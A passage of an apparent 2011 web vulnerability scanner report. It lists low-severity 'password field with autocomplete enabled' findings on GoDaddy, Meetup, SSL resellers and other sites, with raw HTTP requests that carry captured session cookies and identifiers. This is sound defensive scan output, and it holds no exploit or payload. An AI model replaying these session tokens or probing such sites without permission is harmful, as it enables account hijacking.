Status: 200 OK
X-Transaction: 1315055071-41784-59541
ETag: "aec220d2e94a47445b8c29787a579d9e"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:04:31 GMT
X-Runtime: 0.01296
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 739cf79cd76a3368cfe15487620dd315f8303417
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vbXNmdHJlc2Vh%250AcmNoOg9jcmVhdGVkX2F0bCsILPBjLzIBIgpmbGFzaElDOidBY3Rpb25Db250%250Acm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgdpZCIlYzBm%250ANzRjZjk3MDM4ODFjOTY0MDg0NGNiMmIxZDBmNzQ%253D--e88597cf7fe708f50c7e3819dc018c21a00605ee; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 50566
Connection: close

<!DOCTYPE html>
<html>
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<meta name="description" content="Instantly connect to
...[SNIP]...
<div class="front-signin">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="session[password]" title="Password" />
<span class="holder">
...[SNIP]...

12.14. http://vasco.com/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://vasco.com
Path:	/login.aspx

Issue detail

The page contains a form with the following action URL:

http://vasco.com/login.aspx?ReturnUrl=%2ftraining%2four_offering%2felearning%2fcertified_ethical_hacking.aspx

The form contains the following password field with autocomplete enabled:

ctl00$Columns$userLogin$loginUser$Password

Request

Response

12.15. http://vasco.com/user_registration.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://vasco.com
Path:	/user_registration.aspx

Issue detail

The page contains a form with the following action URL:

http://vasco.com/user_registration.aspx

The form contains the following password fields with autocomplete enabled:

ctl00$Content$_txtstatic_password
ctl00$Content$confirm_password

Request

Response

12.16. https://www.cheapssls.com/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.cheapssls.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL:

https://www.cheapssls.com/

The form contains the following password field with autocomplete enabled:

password

Request

GET /index.php?dispatch=checkout.checkout HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6; __utma=207162305.1887707563.1315085424.1315085424.1315085500.2; __utmb=207162305.2.9.1315095837676; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response

12.17. http://www.godaddy.com/Payment/payment-options.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/Payment/payment-options.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?isc=%22&ci=9106&spkey=GDSWNET-M1PWCORPWEB101

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.18. http://www.godaddy.com/affiliates/affiliate-program.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/affiliates/affiliate-program.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?isc=%22&ci=9106&spkey=GDSWNET-M1PWCORPWEB101

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:25:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/affiliates/affiliate-program.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:25:55 GMT
Content-Length: 98753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=%22&ci=9106&spkey=GDSWNET-M1PWCORPWEB101" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...

12.19. http://www.godaddy.com/gdshop/offers/cross_sell.asp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/gdshop/offers/cross_sell.asp

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWB109

The form contains the following password field with autocomplete enabled:

password

Request

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response

12.20. http://www.godaddy.com/ssl/ssl-certificates.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/ssl/ssl-certificates.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?isc=%22&ci=9106&spkey=GDSWNET-M1PWCORPWEB109

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.21. http://www.godaddy.com/ssl/ssl-certificates.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/ssl/ssl-certificates.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109

The form contains the following password field with autocomplete enabled:

password

Request

GET /ssl/ssl-certificates.aspx?ci=8346 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:28:59 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=ci=8346&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=&referringdomain=&split=24; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=wgegihwbqjtcqjfhsblalayejedfpbid; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:28:59 GMT
Content-Length: 133386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...

12.22. http://www.meetup.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://secure.meetup.com/register/

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.meetup.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/whats_new/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MEETUP_MEMBER=id=0&status=1&timestamp=1315055493&bs=0&tz=US%2FEastern&zip=&country=us&city=&state=&lat=0.0&lon=0.0&domain=&dc=&s=88f912a4b3d9f96f4f99f1d5b0e82fe99809932d; MEETUP_AFFIL=affil=meetup&ref=microsoftcambridge.com/events/bostonbizsparkmeetupseptember2011/tabid/879; MEETUP_LANGUAGE=language=en&country=US; trax_ghrollout#1535927=uuid=45bfb8e4-26a5-4d03-bfc0-39f3ea7ec8d0&v=new&p=ghome&s=0&_=cf8b24; MEETUP_GA=id%3D0%26segment%3Dalien%26rg%3Dperksfooter; __utma=19434532.1405489551.1315055535.1315055535.1315055535.1; __utmb=19434532.16.10.1315055535; __utmc=19434532; __utmz=19434532.1315055535.1.1.utmcsr=microsoftcambridge.com|utmccn=(referral)|utmcmd=referral|utmcct=/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx; __utmv=19434532.id%3D0%26segment%3Dalien%26rg%3Dperksfooter

Response

12.23. http://www.meetup.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://secure.meetup.com/login/

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.24. http://www.meetup.com/Boston-BizSpark-Meetup/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/Boston-BizSpark-Meetup/

Issue detail

The page contains a form with the following action URL:

https://secure.meetup.com/login/

The form contains the following password field with autocomplete enabled:

password

Request

GET /Boston-BizSpark-Meetup/ HTTP/1.1
Host: www.meetup.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MEETUP_MEMBER=id=0&status=1&timestamp=1315055493&bs=0&tz=US%2FEastern&zip=&country=us&city=&state=&lat=0.0&lon=0.0&domain=&dc=&s=88f912a4b3d9f96f4f99f1d5b0e82fe99809932d; MEETUP_AFFIL=affil=meetup&ref=microsoftcambridge.com/events/bostonbizsparkmeetupseptember2011/tabid/879; MEETUP_LANGUAGE=language=en&country=US; MEETUP_GA=id%3D0%26segment%3Dalien; __utma=19434532.1405489551.1315055535.1315055535.1315055535.1; __utmb=19434532.4.10.1315055535; __utmc=19434532; __utmz=19434532.1315055535.1.1.utmcsr=microsoftcambridge.com|utmccn=(referral)|utmcmd=referral|utmcct=/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx; __utmv=19434532.id%3D0%26segment%3Dalien

Response

12.25. http://www.meetup.com/Boston-BizSpark-Meetup/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/Boston-BizSpark-Meetup/

Issue detail

The page contains a form with the following action URL:

https://secure.meetup.com/register/

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:11:39 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC"
X-Meetup-server: app3.int.meetup.com
Pragma: No-cache
Cache-Control: no-cache
Expires: 0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 123500
Connection: close

                                                                               <!DOCTYPE html>

                                                                               <html xmlns="http://www.w3.org/1999
...[SNIP]...
<div class="D_boxsection isMeetup">

<form action="https://secure.meetup.com/register/" class="signUp J_signupForm" method="post" id="baseSignUp">
<div class="D_form embiggen">
...[SNIP]...
<div class="input">
<input type="password" class="text " name="password" id="baseSignUp_password" value="" title="Pick a password" />

</div>
...[SNIP]...

12.26. http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/Boston-BizSpark-Meetup/events/30620321/

Issue detail

The page contains a form with the following action URL:

https://secure.meetup.com/register/

The form contains the following password field with autocomplete enabled:

password

Request

GET /Boston-BizSpark-Meetup/events/30620321/ HTTP/1.1
Host: www.meetup.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:11:34 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC"
X-Meetup-server: app12.int.meetup.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 100873
Connection: close

                                                                               <!DOCTYPE html>

                                                                               <html xmlns="http://www
...[SNIP]...
<div class="D_boxsection isMeetup">

<form action="https://secure.meetup.com/register/" class="signUp J_signupForm" method="post" id="baseSignUp">
<div class="D_form embiggen">
...[SNIP]...
<div class="input">
<input type="password" class="text " name="password" id="baseSignUp_password" value="" title="Pick a password" />

</div>
...[SNIP]...

12.27. http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/Boston-BizSpark-Meetup/events/30620321/

Issue detail

The page contains a form with the following action URL:

https://secure.meetup.com/login/

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:11:34 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC"
X-Meetup-server: app12.int.meetup.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 100873
Connection: close

                                                                               <!DOCTYPE html>

                                                                               <html xmlns="http://www
...[SNIP]...
<div class="D_boxsection isMeetup">


<form action="https://secure.meetup.com/login/" method="post" id="loginForm" class="loginForm">
<div class="D_form embiggen">
...[SNIP]...
<div class="input">
<input type="password" id="password" name="password" tabindex="102" class="text" />

</div>
...[SNIP]...

12.28. http://www.meetup.com/sponsorships/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/sponsorships/

Issue detail

The page contains a form with the following action URL:

https://secure.meetup.com/login/

The form contains the following password field with autocomplete enabled:

password

Request

GET /sponsorships/ HTTP/1.1
Host: www.meetup.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MEETUP_MEMBER=id=0&status=1&timestamp=1315055493&bs=0&tz=US%2FEastern&zip=&country=us&city=&state=&lat=0.0&lon=0.0&domain=&dc=&s=88f912a4b3d9f96f4f99f1d5b0e82fe99809932d; MEETUP_AFFIL=affil=meetup&ref=microsoftcambridge.com/events/bostonbizsparkmeetupseptember2011/tabid/879; MEETUP_LANGUAGE=language=en&country=US; trax_ghrollout#1535927=uuid=45bfb8e4-26a5-4d03-bfc0-39f3ea7ec8d0&v=new&p=ghome&s=0&_=cf8b24; __utma=19434532.1405489551.1315055535.1315055535.1315055535.1; __utmb=19434532.8.10.1315055535; __utmc=19434532; __utmz=19434532.1315055535.1.1.utmcsr=microsoftcambridge.com|utmccn=(referral)|utmcmd=referral|utmcct=/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx; __utmv=19434532.id%3D0%26segment%3Dalien; MEETUP_GA=id%3D0%26segment%3Dalien%26rg%3Dperksfooter

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:11:49 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC"
X-Meetup-server: app16.int.meetup.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 21124
Connection: close

                                                                               <!DOCTYPE html>

                                                                               <html xmlns="http://www.w3.org/1999/
...[SNIP]...
<div class="D_boxsection isMeetup">


<form action="https://secure.meetup.com/login/" method="post" id="loginForm" class="loginForm">
<div class="D_form embiggen">
...[SNIP]...
<div class="input">
<input type="password" id="password" name="password" tabindex="102" class="text" />

</div>
...[SNIP]...

12.29. http://www.meetup.com/sponsorships/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/sponsorships/

Issue detail

The page contains a form with the following action URL:

https://secure.meetup.com/register/

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:11:49 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC"
X-Meetup-server: app16.int.meetup.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 21124
Connection: close

                                                                               <!DOCTYPE html>

                                                                               <html xmlns="http://www.w3.org/1999/
...[SNIP]...
<div class="D_boxsection isMeetup">

<form action="https://secure.meetup.com/register/" class="signUp J_signupForm" method="post" id="baseSignUp">
<div class="D_form embiggen">
...[SNIP]...
<div class="input">
<input type="password" class="text " name="password" id="baseSignUp_password" value="" title="Pick a password" />

</div>
...[SNIP]...

12.30. http://www.meetup.com/whats_new/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/whats_new/

Issue detail

The page contains a form with the following action URL:

https://secure.meetup.com/login/

The form contains the following password field with autocomplete enabled:

password

Request

GET /whats_new/ HTTP/1.1
Host: www.meetup.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/sponsorships/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MEETUP_MEMBER=id=0&status=1&timestamp=1315055493&bs=0&tz=US%2FEastern&zip=&country=us&city=&state=&lat=0.0&lon=0.0&domain=&dc=&s=88f912a4b3d9f96f4f99f1d5b0e82fe99809932d; MEETUP_AFFIL=affil=meetup&ref=microsoftcambridge.com/events/bostonbizsparkmeetupseptember2011/tabid/879; MEETUP_LANGUAGE=language=en&country=US; trax_ghrollout#1535927=uuid=45bfb8e4-26a5-4d03-bfc0-39f3ea7ec8d0&v=new&p=ghome&s=0&_=cf8b24; MEETUP_GA=id%3D0%26segment%3Dalien%26rg%3Dperksfooter; __utma=19434532.1405489551.1315055535.1315055535.1315055535.1; __utmb=19434532.12.10.1315055535; __utmc=19434532; __utmz=19434532.1315055535.1.1.utmcsr=microsoftcambridge.com|utmccn=(referral)|utmcmd=referral|utmcct=/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx; __utmv=19434532.id%3D0%26segment%3Dalien%26rg%3Dperksfooter

Response

12.31. http://www.meetup.com/whats_new/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/whats_new/

Issue detail

The page contains a form with the following action URL:

https://secure.meetup.com/register/

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.32. https://www.microcad.ca/auth/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.microcad.ca
Path:	/auth/login

Issue detail

The page contains a form with the following action URL:

https://www.microcad.ca/auth/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /auth/login HTTP/1.1
Host: www.microcad.ca
Connection: keep-alive
Referer: http://www.microcad.ca/cart
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: public=mrff84dil681s0lpbfousev6i6; mf_user=1; mf_session=bc76099c1b4cf7981cbda530d0e66b84; __utma=84250501.1276542809.1315085415.1315085415.1315085415.1; __utmb=84250501.2.10.1315085415; __utmc=84250501; __utmz=84250501.1315085415.1.1.utmcsr=google|utmccn=(not%20set)|utmcmd=product-search|utmctr=ssl%20certificates; mf_lastpageview=1315085500060

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:35:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14105
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Microcad.ca | Log
...[SNIP]...
</h1>

   <form class="myForm login" method="post" action="/auth/login">
               <div>
...[SNIP]...
</label>
           <input type="password" name="password" /></p>
...[SNIP]...

12.33. https://www.sslmatrix.com/Order/quickorder previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/Order/quickorder

Issue detail

The page contains a form with the following action URL:

https://www.sslmatrix.com/Order/quickorder?pid=2&yr=2&ot=new&cc=smr99

The form contains the following password fields with autocomplete enabled:

ctl00$ctl00$cphMain$txtPassword
ctl00$ctl00$cphMain$ContentPlaceHolder1$ctl00$txtPassword

Request

GET /Order/quickorder?pid=2&yr=2&ot=new&cc=smr99 HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: https://www.sslmatrix.com/ssl-promotion-code
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sbarsdjyp5j2be55zav4bkbo

Response

12.34. https://www.sslmatrix.com/Order/quickorder previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/Order/quickorder

Issue detail

The page contains a form with the following action URL:

https://www.sslmatrix.com/Order/quickorder?pid=1&yr=5&ot=new&cc=smr09

The form contains the following password fields with autocomplete enabled:

ctl00$ctl00$cphMain$txtPassword
ctl00$ctl00$cphMain$ContentPlaceHolder1$ctl00$txtPassword

Request

Response

12.35. https://www.sslmatrix.com/ssl-promotion-code previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/ssl-promotion-code

Issue detail

The page contains a form with the following action URL:

https://www.sslmatrix.com/ssl-promotion-code

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$cphMain$txtPassword

Request

Response

12.36. https://www.sslmatrix.com/ssl-promotion-code/ssl-price previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/ssl-promotion-code/ssl-price

Issue detail

The page contains a form with the following action URL:

https://www.sslmatrix.com/ssl-promotion-code/ssl-price

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$cphMain$txtPassword

Request

Response

13. Source code disclosure previous next
There are 9 instances of this issue:

https://platform.linkedin.com/js/secureAnonymousFramework
http://research.microsoft.com/en-us/um/people/helenw/papers/fullMashupOS.pptx
http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pptx
http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/w2sp10.pptx
http://research.microsoft.com/en-us/um/people/yongrui/
http://vasco.com/
